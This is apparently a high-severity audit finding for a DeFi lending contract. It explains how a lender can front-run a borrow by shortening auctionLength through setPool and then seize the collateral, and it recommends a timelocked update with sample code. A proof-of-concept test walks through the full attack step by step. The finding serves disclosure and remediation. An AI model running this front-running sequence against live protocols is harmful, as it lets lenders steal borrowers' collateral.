20,000 USDC
Submission Details
Severity: high
Valid

Changing the length of the liquidation auction in a front-run transaction may lead to immediate collateral seizure

Summary

A borrower's collateral can be seized immediately because a lender can change the length of the liquidation auction in a front-running transaction.

Vulnerability Details

The setPool function allows lenders to set up a pool, providing all necessary parameters. This function can also be called on an existing pool, allowing changes to some of the current pool parameters, including the length of liquidation auctions. A malicious lender can front-run a user's borrow request and change the auctionLength value to 1 second. The lender can then start a refinance auction and seize the user's collateral in the subsequent block, before the user has a chance to react.

    function test_exploitCollateralSeize() public {
        // Lender creates a legitimate pool with auctionLength = 1 days
        vm.startPrank(lender1);
        Pool memory p = Pool({
            lender: lender1,
            loanToken: address(loanToken),
            collateralToken: address(collateralToken),
            minLoanSize: 50*10**18,
            poolBalance: 1000*10**18,
            maxLoanRatio: 1.5*10**18,
            auctionLength: 1 days,
            interestRate: 1000,
            outstandingLoans: 0
        });
        bytes32 poolId = lender.setPool(p);
        // Lender front-runs the user's borrow request and changes auctionLength to 1 second
        p = Pool({
            lender: lender1,
            loanToken: address(loanToken),
            collateralToken: address(collateralToken),
            minLoanSize: 50*10**18,
            poolBalance: 1000*10**18,
            maxLoanRatio: 1.5*10**18,
            auctionLength: 1,
            interestRate: 1000,
            outstandingLoans: 0
        });
        poolId = lender.setPool(p);
        // Borrower requests a loan from the front-run pool
        vm.startPrank(borrower);
        Borrow memory b = Borrow({
            poolId: poolId,
            debt: 50*10**18,
            collateral: 100*10**18
        });
        Borrow[] memory borrows = new Borrow[](1);
        borrows[0] = b;
        lender.borrow(borrows);
        // Lender starts a refinance auction
        vm.startPrank(lender1);
        uint256[] memory loanIds = new uint256[](1);
        loanIds[0] = 0;
        lender.startAuction(loanIds);
        // Lender seizes the collateral in the next block
        skip(1);
        lender.seizeLoan(loanIds);
    }

Impact

Borrower's collateral may be seized right after receiving a loan.

Tools Used

Manual review.

Recommendations

Disallow lenders from changing the auctionLength parameter in the setPool function. Implement a separate function that can change the auctionLength parameter but with a time delay, which adds an extra layer of security and mitigates the potential for front-running.
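
One way to implement the delayed update recommended above, as an added sketch that is not the audited contract's code. The contract name, function names, storage layout and the 2-day delay are all assumptions; createPool stands in for the pool-creation path of setPool.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

/// Added illustration: every name and the delay value here are assumptions.
contract AuctionLengthTimelock {
    uint256 public constant UPDATE_DELAY = 2 days; // assumed value

    struct PendingLength {
        uint256 value;
        uint256 readyAt; // 0 means no change is queued
    }

    mapping(bytes32 => address) public poolLender;
    mapping(bytes32 => uint256) public auctionLength;
    mapping(bytes32 => PendingLength) public pending;

    event AuctionLengthQueued(bytes32 indexed poolId, uint256 value, uint256 readyAt);
    event AuctionLengthApplied(bytes32 indexed poolId, uint256 value);

    modifier onlyLender(bytes32 poolId) {
        require(msg.sender == poolLender[poolId], "not pool lender");
        _;
    }

    /// The initial length is fixed at creation and visible before anyone borrows.
    function createPool(bytes32 poolId, uint256 length) external {
        require(poolLender[poolId] == address(0), "pool exists");
        poolLender[poolId] = msg.sender;
        auctionLength[poolId] = length;
    }

    /// Step 1: announce the new length on-chain; the live value is untouched.
    function queueAuctionLength(bytes32 poolId, uint256 length) external onlyLender(poolId) {
        uint256 readyAt = block.timestamp + UPDATE_DELAY;
        pending[poolId] = PendingLength(length, readyAt);
        emit AuctionLengthQueued(poolId, length, readyAt);
    }

    /// Step 2: the new length takes effect only after the delay has elapsed.
    function applyAuctionLength(bytes32 poolId) external onlyLender(poolId) {
        PendingLength memory p = pending[poolId];
        require(p.readyAt != 0 && block.timestamp >= p.readyAt, "delay not elapsed");
        auctionLength[poolId] = p.value;
        delete pending[poolId];
        emit AuctionLengthApplied(poolId, p.value);
    }
}
```

With this split, a change to auctionLength cannot land in the same block as a pending borrow: it must be queued at least UPDATE_DELAY earlier, and the AuctionLengthQueued event gives borrowers and front ends a signal to check before borrowing.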
